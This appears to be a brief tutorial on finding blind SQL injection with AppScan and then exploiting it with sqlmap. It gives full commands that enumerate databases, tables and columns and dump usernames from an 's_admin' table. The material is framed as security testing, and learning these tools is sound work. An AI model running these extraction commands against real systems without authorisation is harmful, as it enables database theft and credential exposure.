When doing security testing, first use appscan to scan the target website to expose the risk of blind sql injection
Then use the sqlmap professional tool to scan and analyze vulnerabilities
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool Automatic SQL injection and database takeover tool - GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool https://github.com/sqlmapproject/sqlmap Part (request line + request header + request body) is stored as test.txt and placed in the same path as sqlmap.py
- view all databases
python sqlmap.py -r E:\sqlmap-master\test.txt --dbs
There is a parameter in the result indicating that there is indeed a loophole
All database information
- View all table information of the specified database
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn --tables
- View the specified database, all column information of the table
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin --columns
- View the information of the specified database, table, and column
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin -C username --dump
It's terrible, the database data has been leaked, everyone is responsible for network security!